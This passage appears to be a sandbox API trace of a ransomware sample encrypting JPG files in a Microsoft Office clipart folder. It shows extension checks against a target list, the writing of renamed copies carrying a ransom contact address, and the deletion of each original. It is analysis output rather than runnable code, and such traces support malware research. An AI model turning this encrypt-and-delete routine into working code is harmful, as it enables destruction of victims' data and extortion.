lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 68 [0197.437] lstrlenW (lpString=".dbf") returned 4 [0197.437] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 68 [0197.437] lstrlenW (lpString=".1cd") returned 4 [0197.437] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 68 [0197.437] lstrlenW (lpString=".jpg") returned 4 [0197.437] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.437] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.438] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.438] GetLastError () returned 0x0 [0197.438] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xb57d, lpOverlapped=0x0) returned 1 [0197.454] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xb580, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xb580, lpOverlapped=0x0) returned 1 [0197.456] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.456] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.456] SetEndOfFile (hFile=0x340) returned 1 [0197.457] CloseHandle (hObject=0x340) returned 1 [0197.457] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.457] SetEndOfFile (hFile=0x37c) returned 1 [0197.458] CloseHandle (hObject=0x37c) returned 1 [0197.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg")) returned 1 [0197.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 68 [0197.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 68 [0197.459] lstrlenW (lpString=".doc") returned 4 [0197.459] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.459] lstrlenW (lpString=".docx") returned 5 [0197.459] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1 [0197.459] lstrlenW (lpString=".pdf") returned 4 [0197.459] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.459] lstrlenW (lpString=".xls") returned 4 [0197.459] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.459] lstrlenW (lpString=".xlsx") returned 5 [0197.459] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1 [0197.459] lstrlenW (lpString=".ppt") returned 4 [0197.459] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 68 [0197.459] lstrlenW (lpString=".zip") returned 4 [0197.460] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.460] lstrlenW (lpString=".rar") returned 4 [0197.460] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.460] lstrlenW (lpString=".bz2") returned 4 [0197.460] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.460] lstrlenW (lpString=".7z") returned 3 [0197.460] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 68 [0197.460] lstrlenW (lpString=".dbf") returned 4 [0197.460] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 68 [0197.460] lstrlenW (lpString=".1cd") returned 4 [0197.460] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 68 [0197.460] lstrlenW (lpString=".jpg") returned 4 [0197.460] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.460] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.461] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.462] GetLastError () returned 0x0 [0197.462] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x38d8, lpOverlapped=0x0) returned 1 [0197.464] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x38e0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x38e0, lpOverlapped=0x0) returned 1 [0197.465] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.465] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.465] SetEndOfFile (hFile=0x340) returned 1 [0197.465] CloseHandle (hObject=0x340) returned 1 [0197.465] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.465] SetEndOfFile (hFile=0x37c) returned 1 [0197.466] CloseHandle (hObject=0x37c) returned 1 [0197.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.467] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg")) returned 1 [0197.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 68 [0197.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 68 [0197.468] lstrlenW (lpString=".doc") returned 4 [0197.468] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.468] lstrlenW (lpString=".docx") returned 5 [0197.468] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0197.468] lstrlenW (lpString=".pdf") returned 4 [0197.468] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.468] lstrlenW (lpString=".xls") returned 4 [0197.468] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.468] lstrlenW (lpString=".xlsx") returned 5 [0197.468] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0197.468] lstrlenW (lpString=".ppt") returned 4 [0197.468] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 68 [0197.468] lstrlenW (lpString=".zip") returned 4 [0197.468] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.468] lstrlenW (lpString=".rar") returned 4 [0197.468] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.468] lstrlenW (lpString=".bz2") returned 4 [0197.468] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.468] lstrlenW (lpString=".7z") returned 3 [0197.468] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 68 [0197.468] lstrlenW (lpString=".dbf") returned 4 [0197.468] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 68 [0197.468] lstrlenW (lpString=".1cd") returned 4 [0197.468] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 68 [0197.469] lstrlenW (lpString=".jpg") returned 4 [0197.469] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.469] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.469] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.470] GetLastError () returned 0x0 [0197.470] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xb12e, lpOverlapped=0x0) returned 1 [0197.726] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xb130, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xb130, lpOverlapped=0x0) returned 1 [0197.728] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.728] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.728] SetEndOfFile (hFile=0x340) returned 1 [0197.829] CloseHandle (hObject=0x340) returned 1 [0197.829] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.829] SetEndOfFile (hFile=0x37c) returned 1 [0197.831] CloseHandle (hObject=0x37c) returned 1 [0197.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.831] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg")) returned 1 [0197.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 68 [0197.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 68 [0197.832] lstrlenW (lpString=".doc") returned 4 [0197.832] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.832] lstrlenW (lpString=".docx") returned 5 [0197.832] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0197.832] lstrlenW (lpString=".pdf") returned 4 [0197.832] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.832] lstrlenW (lpString=".xls") returned 4 [0197.832] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.832] lstrlenW (lpString=".xlsx") returned 5 [0197.832] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0197.832] lstrlenW (lpString=".ppt") returned 4 [0197.832] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 68 [0197.832] lstrlenW (lpString=".zip") returned 4 [0197.832] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.832] lstrlenW (lpString=".rar") returned 4 [0197.833] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.833] lstrlenW (lpString=".bz2") returned 4 [0197.833] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.833] lstrlenW (lpString=".7z") returned 3 [0197.833] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 68 [0197.833] lstrlenW (lpString=".dbf") returned 4 [0197.833] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 68 [0197.833] lstrlenW (lpString=".1cd") returned 4 [0197.833] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 68 [0197.833] lstrlenW (lpString=".jpg") returned 4 [0197.833] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.833] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.833] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.834] GetLastError () returned 0x0 [0197.834] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x8a0c, lpOverlapped=0x0) returned 1 [0197.837] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x8a10, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x8a10, lpOverlapped=0x0) returned 1 [0197.838] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.838] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.839] SetEndOfFile (hFile=0x340) returned 1 [0197.839] CloseHandle (hObject=0x340) returned 1 [0197.839] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.839] SetEndOfFile (hFile=0x37c) returned 1 [0197.840] CloseHandle (hObject=0x37c) returned 1 [0197.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.840] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg")) returned 1 [0197.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 68 [0197.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 68 [0197.841] lstrlenW (lpString=".doc") returned 4 [0197.841] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.841] lstrlenW (lpString=".docx") returned 5 [0197.841] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0197.841] lstrlenW (lpString=".pdf") returned 4 [0197.841] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.841] lstrlenW (lpString=".xls") returned 4 [0197.841] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.841] lstrlenW (lpString=".xlsx") returned 5 [0197.841] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0197.841] lstrlenW (lpString=".ppt") returned 4 [0197.841] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 68 [0197.842] lstrlenW (lpString=".zip") returned 4 [0197.842] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.842] lstrlenW (lpString=".rar") returned 4 [0197.842] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.842] lstrlenW (lpString=".bz2") returned 4 [0197.842] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.842] lstrlenW (lpString=".7z") returned 3 [0197.842] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 68 [0197.842] lstrlenW (lpString=".dbf") returned 4 [0197.842] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 68 [0197.842] lstrlenW (lpString=".1cd") returned 4 [0197.842] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 68 [0197.842] lstrlenW (lpString=".jpg") returned 4 [0197.842] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.843] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.843] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.843] GetLastError () returned 0x0 [0197.844] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x7d6e, lpOverlapped=0x0) returned 1 [0197.846] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x7d70, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x7d70, lpOverlapped=0x0) returned 1 [0197.848] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.848] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.848] SetEndOfFile (hFile=0x340) returned 1 [0197.848] CloseHandle (hObject=0x340) returned 1 [0197.848] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.848] SetEndOfFile (hFile=0x37c) returned 1 [0197.849] CloseHandle (hObject=0x37c) returned 1 [0197.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.850] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg")) returned 1 [0197.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 68 [0197.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 68 [0197.850] lstrlenW (lpString=".doc") returned 4 [0197.850] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.850] lstrlenW (lpString=".docx") returned 5 [0197.850] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0197.851] lstrlenW (lpString=".pdf") returned 4 [0197.851] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.851] lstrlenW (lpString=".xls") returned 4 [0197.851] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.851] lstrlenW (lpString=".xlsx") returned 5 [0197.851] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0197.851] lstrlenW (lpString=".ppt") returned 4 [0197.851] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 68 [0197.851] lstrlenW (lpString=".zip") returned 4 [0197.851] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.851] lstrlenW (lpString=".rar") returned 4 [0197.851] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.851] lstrlenW (lpString=".bz2") returned 4 [0197.851] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.851] lstrlenW (lpString=".7z") returned 3 [0197.851] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 68 [0197.851] lstrlenW (lpString=".dbf") returned 4 [0197.851] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 68 [0197.851] lstrlenW (lpString=".1cd") returned 4 [0197.851] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 68 [0197.851] lstrlenW (lpString=".jpg") returned 4 [0197.851] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.852] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.852] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.853] GetLastError () returned 0x0 [0197.853] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x40e7, lpOverlapped=0x0) returned 1 [0197.855] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x40f0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x40f0, lpOverlapped=0x0) returned 1 [0197.856] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, 